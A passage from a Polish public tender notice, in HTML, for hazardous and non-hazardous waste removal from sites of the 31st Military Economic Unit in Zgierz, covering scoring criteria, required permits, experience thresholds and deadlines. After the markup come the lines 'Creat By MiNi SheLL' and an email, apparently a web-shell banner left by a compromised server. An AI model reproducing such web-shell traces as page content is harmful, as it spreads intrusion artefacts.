INNYCH NIŻ NIEBEZPIECZNE Z TERENÓW ADMINISTROWANYCH PRZEZ <br/>31 WOJSKOWY ODDZIAŁ GOSPODARCZY W ZGIERZU<br/>1.	Rodzaje ilości, miejsca i częstotliwość odbioru odpadów niebezpiecznych <br/>i innych niż niebezpieczne pokazuje tabela w rozdziale III w SWZ (zadanie nr 3).<br/>1)	Wykonawca usługi akceptuje fakt, że podane ilości odpadów są szacunkowe i w trakcie realizacji umowy mogą ulec zmniejszeniu, natomiast nie mogą być większe niż określono w w/w tabeli. Przewidywana częstotliwość odbioru odpadów od Zamawiającego będzie nie większa niż 1 do 2 odbiorów w ciągu roku z danego miejsca wyszczególnionego w kol. 4 w/w tabeli. <br/> Zamawiający nie jest w stanie określić szacunkowej ilości odpadów przypadającej na jeden odbiór.<br/> Zamawiający będzie zgłaszał Wykonawcy odbiory odpadów łącząc kilka rodzajów odpadów z kilku miejsc na terenie danego kompleksu wojskowego <br/>w ilościach zapewniających ograniczenie kosztów transportowych <br/>dla Wykonawcy. <br/><br/>2)	Załadunek odpadów w trakcie ich odbioru należy do obowiązków Wykonawcy. <br/><br/>3)	Wykonawca musi posiadać niezbędną wiedzę i doświadczenie oraz dysponować odpowiednim potencjałem technicznym i osobami zdolnymi <br/> do realizacji przedmiotu zamówienia. <br/><br/>4)	Ilość odebranych odpadów zostanie określona na podstawie ważenia przez Wykonawcę z zastrzeżeniem, że ilość odebranych odpadów nie może przekroczyć ilości określonej w zleceniu e-mail lub fax uzyskanym <br/>od Zamawiającego. Wagę do ważenia odpadów przy przekazywaniu zabezpieczy Wykonawca. Waga musi spełniać wymagania metrologiczne wymagane przy obrocie towarowym oraz posiadać deklaracje zgodności lub tabliczkę znamionową z pierwotną lub wtórną legalizacją wagi ważną przez cały okres obowiązywania umowy. <br/><br/>5)	Każdorazowe przekazanie odpadów odbywać się będzie na podstawie Karty Przekazania Odpadów. <br/><br/>6)	Odbiór, transport i utylizacja odpadów niebezpiecznych i innych niż niebezpieczne będą się odbywać zgodnie z obowiązującymi przepisami prawa w szczególności:<br/> Ustawą o odpadach z dnia 14 grudnia 2012 r. (tekst jednolity Dz. U. 2021 r. <br/> poz. 779 z późn. zm.) oraz obowiązującymi aktami wykonawczymi. <br/>	Ustawą z dnia 27 kwietnia 2001r. Prawo ochrony środowiska – <br/>(tekst jednolity Dz. U. z 2021 poz. 1973 z późn zm.)<br/>	Rozporządzeniem Ministra Środowiska z dnia 7 października 2016 r. w sprawie szczegółowych wymagań dla transportu odpadów (Dz.U.2016, poz. 1742). <br/> <br/>7)	Sposób wyceny realizacji usługi:<br/> Wartość realizacji przedmiotu zamówienia będzie obejmowała wszystkie koszty wykonania przedmiotu usługi łącznie z kosztami osobowymi Wykonawcy, kosztami transportu, załadunku, zapewnienie wymaganych pojemników, bezpiecznego zgodnego z obowiązującymi przepisami transportu odpadów itp.<br/><br/> Szczegółowe wymagania zawarto w projektowanym postanowieniu umowy na zad. nr 3 stanowiącej załącznik Nr 3 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">ZADANIE 3<br/><br/>KRYTERIUM A+B	WAGA<br/><br/>A	Liczba punktów uzyskanych w kryterium – cena oferty	80 pkt.<br/><br/>B	Liczba punktów uzyskanych w kryterium – termin odbioru odpadów niebezpiecznych i innych niż niebezpieczne od momentu zgłoszenia telefonicznego 20	pkt.<br/><br/>a)	Kryterium cena oferty – 80 pkt. <br/><br/> Cena brutto oferty najniżej skalkulowanej<br/>Cena = ---------------------------------------------------------------- x 80 (pkt)<br/> Cena brutto ocenianej oferty <br/> <br/>Oferta, która uzyska najniższą cenę otrzyma maksymalną liczbę punktów – 80 pkt. Pozostałe oferty zostaną przeliczone według powyższego wzoru. Wynik będzie traktowany jako wartość punktowa oferty w kryterium cena oferty.<br/><br/>b)	Kryterium termin odbioru odpadów niebezpiecznych i innych niż niebezpieczne od momentu zgłoszenia telefonicznego - 20 pkt.<br/><br/>Przy ocenie ofert wg kryterium „ termin odbioru odpadów niebezpiecznych <br/>i innych niż niebezpieczne od momentu zgłodzenia telefonicznego ” Zamawiający przydzieli następującą liczbę punktów:<br/><br/>•	za odbiór odpadów &gt; 9 dni od momentu zgłoszenia - 0 pkt.<br/>•	za odbiór odpadów do 9 dni od momentu zgłoszenia - 5 pkt.<br/>•	za odbiór odpadów do 7 dni od momentu zgłoszenia - 10 pkt. <br/>•	za odbiór odpadów do 5 dni od momentu zgłoszenia - 20 pkt.<br/><br/>W celu potwierdzenia spełnienia tego kryterium należy w formularzu ofertowym – załączniku nr 6 do SIWZ- oświadczyć, w jakim terminie nastąpi odbiór odpadów niebezpiecznych i innych niż niebezpieczne od momentu zgłoszenia telefonicznego.<br/><br/>PUNKTACJA BĘDZIE LICZONA DLA KAŻDEGO ZADANIA OSOBNO !</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Liczba punktów uzyskanych w kryterium – termin odbioru odpadów niebezpiecznych i innych niż niebezpieczne od momentu zgłoszenia telefonicznego</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy:<br/><br/>1)	nie podlegają wykluczeniu na podstawie art. 108 ust. 1 ustawy PZP<br/>2)	spełniają warunki udziału w postępowaniu dotyczące:<br/><br/>a)	zdolności do występowania w obrocie gospodarczym:<br/><br/>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/><br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, jeśli wynika to z odrębnych przepisów:<br/><br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że posiada<br/><br/>Dla Zadania 1:<br/>- aktualną decyzję właściwego organu Inspekcji Weterynaryjnej na przewóz odpadów kat. III określonymi środkami transportu;<br/>- aktualną decyzję Inspekcji Weterynaryjnej nadającej nr identyfikacyjny na prowadzenie działalności gospodarczej w zakresie transportu odpadów kat. III (tj. ubocznych produktów pochodzenia zwierzęcego);<br/>- zezwolenie wydane w drodze decyzji przez właściwy organ na prowadzenie działalności dotyczącej gospodarki odpadami w zakresie zbierania, przetwarzania odpadów o kodzie zgodnym przedmiotem zamówienia zgodnie z Ustawą z dnia 14 grudnia 2012 r (tekst jednolity Dz. U. 2021 r. poz. 779 z późn. zm.);<br/>- aktualny wpis do rejestru BDO (Bazy Danych o odpadach) w zakresie prowadzonej działalności stanowiącej przedmiot zamówienia zgodnie <br/>z Ustawą o odpadach z dnia 14 grudnia 2012 r. (tekst jednolity Dz. U. 2021 r. poz. 779 z późn. zm.)<br/><br/>Dla Zadania 2:<br/><br/>- decyzję (pozwolenie, zezwolenie) wydaną przez właściwy organ na prowadzenie działalności w zakresie utylizacji odpadów medycznych zgodnie z Ustawą o odpadach z dnia 14 grudnia 2012 r. (tekst jednolity Dz. U. 2021 r. poz. 797 z późn. zm.) ,<br/>- wpis do BDO (Bazy Danych o odpadach) w zakresie transportu zg. z Ustawą <br/>o odpadach z dnia 14 grudnia 2012 r. (tekst jednolity Dz. U. 2021 r. poz. 779 <br/>z późn. zm.) <br/><br/>Dla Zadania 3:<br/><br/>- decyzji na prowadzenie działalności w zakresie zagospodarowania odpadów będących przedmiotem zamówienia tj. pozwolenia na zbiórkę i/lub odzysk i/lub unieszkodliwienie w zależności od charakteru prowadzonej działalności zgodnie z Ustawą o odpadach z dnia 14 grudnia 2012 r. (tekst jednolity Dz. U. 2021 r. poz. 779 z późn. zm.) oraz obowiązującymi aktami wykonawczymi.<br/>- wpis do rejestru BDO (Bazy Danych o odpadach) w zakresie transportu zg. <br/>z Ustawą o odpadach z dnia 14 grudnia 2012 r.(tekst jednolity Dz. U. 2021 r. poz. 779 z późn. zm.)<br/><br/>c) sytuacji ekonomicznej lub finansowej:<br/><br/>Zamawiający nie stawia w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny.<br/><br/>d) zdolności technicznej lub zawodowej: <br/><br/>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że wykonał lub wykonuje w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej 1 (jednej) usługi, odpowiadającej swoim rodzajem usługi stanowiącej przedmiot zamówienia, z podaniem wartości, przedmiotu, dat wykonania i podmiotu, na rzecz którego usługa została wykonana lub jest wykonywana należycie zgodnie z poniższą tabelą. <br/><br/>Wartość każdej (pojedynczej) dostawy winna być nie mniejsza niż: <br/>Nr zadania	Przedmiot zamówienia	Wartość brutto w zł<br/>Zadanie 1	Usługa odbioru i unieszkodliwienie odpadów pokonsumpcyjnych z terenów administrowanych przez 31 Wojskowy Oddział Gospodarczy w Zgierzu	100 000,00<br/>Zadanie 2	Usługa odbioru i utylizacji odpadów medycznych z terenów administrowanych przez 31 Wojskowy Oddział Gospodarczy w Zgierzu	30 000,00<br/>Zadanie 3	Usługa odbioru i unieszkodliwienie odpadów niebezpiecznych i innych niż niebezpieczne z terenów administrowanych przez 31 Wojskowy Oddział Gospodarczy w Zgierzu 150 000,00<br/>UWAGA:<br/><br/>Jeżeli Wykonawca składa ofertę na trzy zadania musi wykazać się doświadczeniem zdobytym poprzez zrealizowanie usługi na kwotę odpowiadającą każdemu z tych zadań (tj. jeżeli Wykonawca składa ofertę np. na zadanie 1, 2 i 3 musi wykazać, iż posiada doświadczenie zdobyte poprzez zrealizowanie co najmniej jednej usługi stanowiącej przedmiot zamówienia polegającej na usłudze odbioru i unieszkodliwieniu odpadów pokonsumpcyjnych (zadanie nr 1 – min. 100 000,00 zł), usłudze odbioru i utylizacji odpadów medycznych (zadanie nr 2 – min. 30 000,00 zł) oraz usłudze odbioru i unieszkodliwieniu odpadów niebezpiecznych i innych niż niebezpieczne (zadanie nr 3 – min. 150 000,00 zł), przy czym jedna usługa zrealizowana na podstawie jednej umowy.<br/><br/>Wykonawca obowiązany jest do załączenia dowodów określających, że usługa została wykonana należycie. Dowodami o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych są wykonywane, a jeżeli <br/>z uzasadnionej przyczyny o obiektywnym charakterze. Wykonawca nie jest <br/>w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy. W przypadku świadczeń okresowych nadal wykonywanych – referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie – powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert i potwierdzać doświadczenie na wymaganą kwotę.<br/><br/>Wykonawca, na wezwanie Zamawiającego, zobowiązany będzie złożyć wypełniony wykaz usług (Załącznik Nr 9 do SWZ) wraz z dokumentami potwierdzającymi należyte wykonanie wskazanych w wykazie usług. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wykazania braku podstaw do wykluczenia z postępowania <br/>o udzielenie zamówienia w oryginale w formie elektronicznej podpisane kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzone podpisem zaufanym lub elektronicznym podpisem osobistym:<br/><br/>•	Oświadczenia Wykonawcy, w zakresie art. 108 ust. 5 ustawy PZP, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę lub ofertę częściową albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej. Wzór oświadczenia, o którym mowa stanowi Załącznik Nr 7 do SWZ.<br/><br/>•	oświadczenie w celu potwierdzenia aktualności informacji przedstawionych w oświadczeniu, o którym mowa w art. 125 ust.1 w oryginale w formie elektronicznej podpisane kwalifikowanym podpisem elektronicznym lub <br/>w postaci elektronicznej opatrzone podpisem zaufanym lub elektronicznym podpisem osobistym zgodnie z załącznikiem nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełnienia warunków udziału w postępowaniu <br/>Wykonawca jest zobowiązany złożyć następujące dokumenty:<br/><br/>Dla Zadania 1:<br/>- aktualną decyzję właściwego organu Inspekcji Weterynaryjnej na przewóz odpadów kat. III określonymi środkami transportu.;<br/>- aktualną decyzję Inspekcji Weterynaryjnej nadającej nr identyfikacyjny na prowadzenie działalności gospodarczej w zakresie transportu odpadów kat. III (tj. ubocznych produktów pochodzenia zwierzęcego);<br/>- zezwolenie wydane w drodze decyzji przez właściwy organ na prowadzenie działalności dotyczącej gospodarki odpadami w zakresie zbierania, przetwarzania odpadów o kodzie zgodnym przedmiotem zamówienia zgodnie <br/>z Ustawą z dnia 14 grudnia 2012 r (tekst jednolity Dz. U. 2021 r. poz. 779 <br/>z późn. zm.;<br/>- aktualny wpis do rejestru BDO (Bazy Danych o odpadach) w zakresie prowadzonej działalności stanowiącej przedmiot zamówienia zgodnie z Ustawą o odpadach z dnia 14 grudnia 2012 r. (tekst jednolity Dz. U. 2021 r. poz. 779 <br/>z późn. zm.)<br/><br/>Dla Zadania 2:<br/>- decyzję (pozwolenie, zezwolenie) wydaną przez właściwy organ na prowadzenie działalności w zakresie utylizacji odpadów medycznych zgodnie z Ustawą o odpadach z dnia 14 grudnia 2012 r. (tekst jednolity Dz. U. 2021 r. poz. 779 z późn. zm.),<br/>- wpis do BDO (Bazy Danych o odpadach) w zakresie transportu zg. z Ustawą <br/>o odpadach z dnia 14 grudnia 2012 r. (tekst jednolity Dz. U. 2021 r. poz. 779 <br/>z późn. zm.) <br/><br/>Dla Zadania 3:<br/>- decyzji na prowadzenie działalności w zakresie zagospodarowania odpadów będących przedmiotem zamówienia tj. pozwolenia na zbiórkę i/lub odzysk i/lub unieszkodliwienie w zależności od charakteru prowadzonej działalności zgodnie z Ustawą o odpadach z dnia 14 grudnia 2012 r. (tekst jednolity Dz. U. 2021 r. poz. 779 z późn. zm.) oraz obowiązującymi aktami wykonawczymi.<br/>- wpis do rejestru BDO (Bazy Danych o odpadach) w zakresie transportu zg. <br/>z Ustawą o odpadach z dnia 14 grudnia 2012 r.(tekst jednolity Dz. U. 2021 r. poz. 779 z późn. zm.)<br/><br/> Jeżeli przedmiotowe zezwolenia i decyzje zostały wystawione przez upoważnione podmioty inne niż Wykonawca, jako dokument elektroniczny Wykonawca przekazuje ten dokument.<br/> Jeżeli przedmiotowe zezwolenia i decyzje zostały wystawione przez upoważnione podmioty, jako dokument w postaci papierowej, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym, poświadczając zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/><br/>Dla zadań 1- 3<br/><br/>- wykaz usług wg Załącznika nr 9 do SWZ. Podane w wykazie usługi muszą spełniać warunki określone w Rozdziale V SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego.<br/>Pełnomocnictwo powinno być załączone do oferty i zawierać w szczególności wskazanie:<br/>•	postępowania o zamówienie publiczne, którego dotyczą,<br/>•	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>•	ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/><br/>Wymagana forma:<br/>Pełnomocnictwo składa się, jako dokument elektroniczny opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub osobistym podpisem elektronicznym.<br/><br/>W przypadku gdy pełnomocnictwo zostało wystawione, jako dokument <br/>w postaci papierowej, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub elektronicznym podpisem osobistym, poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej.<br/><br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem <br/>w postaci papierowej mogą dokonać mocodawcy lub notariusz. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. <br/>Zamawiający uzna warunek dotyczący uprawnień i doświadczenia, o którym mowa w ust. 1 pkt. 2 lit. b i c rozdziału IV SWZ, za spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia posiada przedmiotowe uprawnienia i doświadczenie <br/>i zrealizuje usługę będącą przedmiotem zamówienia, do realizacji której te uprawnienia i doświadczenie są wymagane.<br/>W przypadku, o którym mowa w ust. 2 (powyżej) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, <br/>z którego wynika które usługi wykonają poszczególni Wykonawcy.<br/>Oświadczenie o niepodleganiu wykluczeniu oraz o spełnieniu warunków udziału w postępowaniu składa każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-17 10:10</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">platformazakupowa.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-17 10:20</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com